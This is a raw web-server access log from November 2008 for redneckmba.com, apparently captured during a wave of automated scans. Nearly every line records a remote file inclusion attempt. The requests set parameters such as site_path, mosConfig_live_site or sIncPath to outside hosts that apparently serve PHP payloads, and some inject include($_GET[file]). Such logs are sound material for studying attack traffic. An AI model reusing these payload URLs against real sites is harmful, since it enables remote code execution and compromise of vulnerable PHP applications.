216.75.35.118 - - [16/Nov/2008:17:40:17 -0800] "GET /logs//rgboard/include/bbs.lib.inc.php?site_path=http://www.elitewheels.ru/images/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.114.105 - - [16/Nov/2008:17:40:24 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
61.109.250.156 - - [16/Nov/2008:17:47:15 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
61.109.250.156 - - [16/Nov/2008:17:47:15 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
61.109.250.156 - - [16/Nov/2008:17:47:16 -0800] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
61.109.250.156 - - [16/Nov/2008:17:47:18 -0800] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
61.109.250.156 - - [16/Nov/2008:17:47:18 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
61.109.250.156 - - [16/Nov/2008:17:47:18 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
207.44.238.31 - - [16/Nov/2008:17:51:47 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fssi.com.ph/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "redneckmba.com"
207.44.238.31 - - [16/Nov/2008:17:51:47 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fssi.com.ph/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "redneckmba.com"
61.109.250.156 - - [16/Nov/2008:17:53:05 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
61.109.250.156 - - [16/Nov/2008:17:57:13 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.123.58 - - [16/Nov/2008:17:57:52 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
208.69.123.58 - - [16/Nov/2008:17:57:52 -0800] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
208.69.123.58 - - [16/Nov/2008:17:57:52 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
66.163.171.206 - - [16/Nov/2008:18:07:49 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
70.85.149.242 - - [16/Nov/2008:18:14:40 -0800] "GET /ashnews.php?pathtoashnews=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.redneckmba.com"
70.85.149.242 - - [16/Nov/2008:18:15:40 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "redneckmba.com"
70.85.149.242 - - [16/Nov/2008:18:15:41 -0800] "GET /ashnews.php?pathtoashnews=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "redneckmba.com"
70.85.149.242 - - [16/Nov/2008:18:15:41 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "redneckmba.com"
80.67.23.90 - - [16/Nov/2008:18:15:50 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 1944 "-" "libwww-perl/5.808" "www.redneckmba.com"
80.67.23.90 - - [16/Nov/2008:18:15:51 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.redneckmba.com"
78.31.64.178 - - [16/Nov/2008:18:15:55 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 1944 "-" "libwww-perl/5.805" "www.redneckmba.com"
78.31.64.178 - - [16/Nov/2008:18:15:55 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.redneckmba.com"
78.31.64.178 - - [16/Nov/2008:18:15:57 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 1944 "-" "libwww-perl/5.805" "www.redneckmba.com"
78.31.64.178 - - [16/Nov/2008:18:15:57 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.redneckmba.com"
80.67.20.101 - - [16/Nov/2008:18:16:13 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 1944 "-" "libwww-perl/5.808" "www.redneckmba.com"
80.67.20.101 - - [16/Nov/2008:18:16:13 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.redneckmba.com"
80.67.23.90 - - [16/Nov/2008:18:16:19 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 1944 "-" "libwww-perl/5.808" "www.redneckmba.com"
80.67.23.90 - - [16/Nov/2008:18:16:19 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.redneckmba.com"
80.67.20.101 - - [16/Nov/2008:18:16:27 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 1944 "-" "libwww-perl/5.808" "www.redneckmba.com"
80.67.20.101 - - [16/Nov/2008:18:16:27 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.redneckmba.com"
77.221.130.15 - - [16/Nov/2008:18:16:40 -0800] "GET /logs/access.log/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
77.221.130.15 - - [16/Nov/2008:18:16:41 -0800] "GET /errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
77.221.130.15 - - [16/Nov/2008:18:16:41 -0800] "GET /logs/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
77.221.130.15 - - [16/Nov/2008:18:17:56 -0800] "GET /logs/access.log/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
77.221.130.15 - - [16/Nov/2008:18:17:56 -0800] "GET /errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
77.221.130.15 - - [16/Nov/2008:18:17:56 -0800] "GET /logs/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
83.222.4.51 - - [16/Nov/2008:18:18:34 -0800] "GET /logs/access.log/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "redneckmba.com"
83.222.4.51 - - [16/Nov/2008:18:18:34 -0800] "GET /logs/access.log/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "redneckmba.com"
83.222.4.51 - - [16/Nov/2008:18:18:34 -0800] "GET /errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "redneckmba.com"
83.222.4.51 - - [16/Nov/2008:18:18:34 -0800] "GET /errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "redneckmba.com"
83.222.4.51 - - [16/Nov/2008:18:18:34 -0800] "GET /logs/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "redneckmba.com"
83.222.4.51 - - [16/Nov/2008:18:18:34 -0800] "GET /logs/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "redneckmba.com"
91.103.204.230 - - [16/Nov/2008:18:19:30 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 1944 "-" "libwww-perl/5.79" "www.redneckmba.com"
91.103.204.230 - - [16/Nov/2008:18:19:30 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.redneckmba.com"
70.38.54.118 - - [16/Nov/2008:18:19:41 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:19:59 -0800] "GET /logs/access.log//convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:19:59 -0800] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:19:59 -0800] "GET /convert/mvcw_conver.php?step=1&vwar_root=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
77.221.130.15 - - [16/Nov/2008:18:22:39 -0800] "GET /logs/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
77.221.130.15 - - [16/Nov/2008:18:22:40 -0800] "GET /errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
64.18.162.8 - - [16/Nov/2008:18:23:37 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 1944 "-" "libwww-perl/5.79" "www.redneckmba.com"
64.18.162.8 - - [16/Nov/2008:18:23:37 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.redneckmba.com"
64.18.162.8 - - [16/Nov/2008:18:23:56 -0800] "GET /logs//?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 1944 "-" "libwww-perl/5.79" "www.redneckmba.com"
64.18.162.8 - - [16/Nov/2008:18:23:57 -0800] "GET /?sIncPath=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.redneckmba.com"
207.250.188.51 - - [16/Nov/2008:18:24:26 -0800] "GET /logs/access.log%20%20//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
207.250.188.51 - - [16/Nov/2008:18:24:26 -0800] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
80.67.21.107 - - [16/Nov/2008:18:26:21 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:26:23 -0800] "GET /logs/access.log/errors.php?error=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
80.67.21.107 - - [16/Nov/2008:18:26:25 -0800] "GET /ashnews.php?pathtoashnews=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.redneckmba.com"
80.67.21.107 - - [16/Nov/2008:18:26:26 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:26:26 -0800] "GET /errors.php?error=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:26:28 -0800] "GET /logs/errors.php?error=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:26:29 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:26:29 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:26:29 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
217.111.67.5 - - [16/Nov/2008:18:27:32 -0800] "GET /mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
217.111.67.5 - - [16/Nov/2008:18:27:33 -0800] "GET /logs//mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
217.111.67.5 - - [16/Nov/2008:18:27:33 -0800] "GET /logs/access.log//mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.dhammajak.net/guestbook/admin/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
203.146.251.182 - - [16/Nov/2008:18:27:36 -0800] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
203.146.251.182 - - [16/Nov/2008:18:27:36 -0800] "GET /logs/access.log%20%20//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
77.221.130.15 - - [16/Nov/2008:18:27:46 -0800] "GET /logs/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
77.221.130.15 - - [16/Nov/2008:18:27:46 -0800] "GET /errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
58.227.192.80 - - [16/Nov/2008:18:29:12 -0800] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
58.227.192.80 - - [16/Nov/2008:18:29:12 -0800] "GET /logs/access.log%20%20//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
58.227.192.80 - - [16/Nov/2008:18:29:12 -0800] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
70.38.54.118 - - [16/Nov/2008:18:29:12 -0800] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.redneckmba.com"
70.38.54.118 - - [16/Nov/2008:18:29:12 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.redneckmba.com"
70.38.54.118 - - [16/Nov/2008:18:29:12 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:33:10 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:33:10 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:33:10 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
193.50.153.9 - - [16/Nov/2008:18:35:16 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
193.50.153.9 - - [16/Nov/2008:18:35:16 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
83.222.4.51 - - [16/Nov/2008:18:35:59 -0800] "GET /logs/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
83.222.4.51 - - [16/Nov/2008:18:35:59 -0800] "GET /errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
66.55.139.190 - - [16/Nov/2008:18:38:04 -0800] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
66.55.139.190 - - [16/Nov/2008:18:38:04 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
66.55.139.190 - - [16/Nov/2008:18:38:04 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "redneckmba.com"
83.222.4.51 - - [16/Nov/2008:18:39:38 -0800] "GET /logs/errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
83.222.4.51 - - [16/Nov/2008:18:39:38 -0800] "GET /errors.php?error=http://www.automarket1.com//components/com_login/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
209.172.57.245 - - [16/Nov/2008:18:40:11 -0800] "GET /logs/access.log/errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
209.172.57.245 - - [16/Nov/2008:18:40:11 -0800] "GET /errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
209.172.57.245 - - [16/Nov/2008:18:40:11 -0800] "GET /logs/errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
66.55.139.190 - - [16/Nov/2008:18:43:06 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
66.55.139.190 - - [16/Nov/2008:18:43:06 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://dinkesrl.net/.idc/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:48:54 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:48:54 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:48:54 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
209.172.57.245 - - [16/Nov/2008:18:49:46 -0800] "GET /logs/errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
209.172.57.245 - - [16/Nov/2008:18:49:46 -0800] "GET /errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
222.122.52.79 - - [16/Nov/2008:18:50:36 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
222.122.52.79 - - [16/Nov/2008:18:52:06 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:52:07 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:52:07 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
222.122.52.79 - - [16/Nov/2008:18:52:07 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
222.122.52.79 - - [16/Nov/2008:18:52:08 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.spikeblood.helloweb.eu/dati/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.123.193 - - [16/Nov/2008:18:58:17 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:59:08 -0800] "GET /logs/access.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:59:08 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:18:59:08 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
89.186.1.54 - - [16/Nov/2008:18:59:12 -0800] "GET /logs/access.log/errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.redneckmba.com"
89.186.1.54 - - [16/Nov/2008:18:59:12 -0800] "GET /errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.redneckmba.com"
89.186.1.54 - - [16/Nov/2008:18:59:12 -0800] "GET /logs/errors.php?error=http://www.spidergenie.com//config/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:19:00:18 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:19:00:19 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
84.21.71.133 - - [16/Nov/2008:19:01:45 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://paginas.terra.com.br/lazer/xum/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
